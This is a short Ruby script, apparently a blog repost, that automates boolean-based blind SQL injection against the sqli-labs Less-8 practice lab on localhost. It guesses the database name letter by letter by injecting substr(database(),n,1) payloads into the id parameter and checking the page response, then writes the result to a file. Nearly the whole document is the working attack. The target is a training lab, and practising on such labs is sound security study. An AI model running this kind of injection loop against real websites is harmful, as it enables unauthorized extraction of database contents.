require 'http' f = open'q.txt','a' # 猜数据库库名 dbname = [] [*1..50].each do |number| [*'a'..'z'].each do |str| url = "http://127.0.0.1/sqli-labs-master/Less-8/?id=1'+and+substr(database(),#{number},1)='#{str}'--+-" p url html = HTTP.get url #puts html.to_s if /You are in/ =~ html.to_s puts '1!!!!' dbname.push str p dbname.join break end #如果全部猜完了都没猜到就写入文件之后就退出 if str == 'z' puts 'no' f.puts dbname.join f.flush exit end end end
猜数据库脚本
猜你喜欢
转载自www.cnblogs.com/cat2020/p/12665380.html
今日推荐
周排行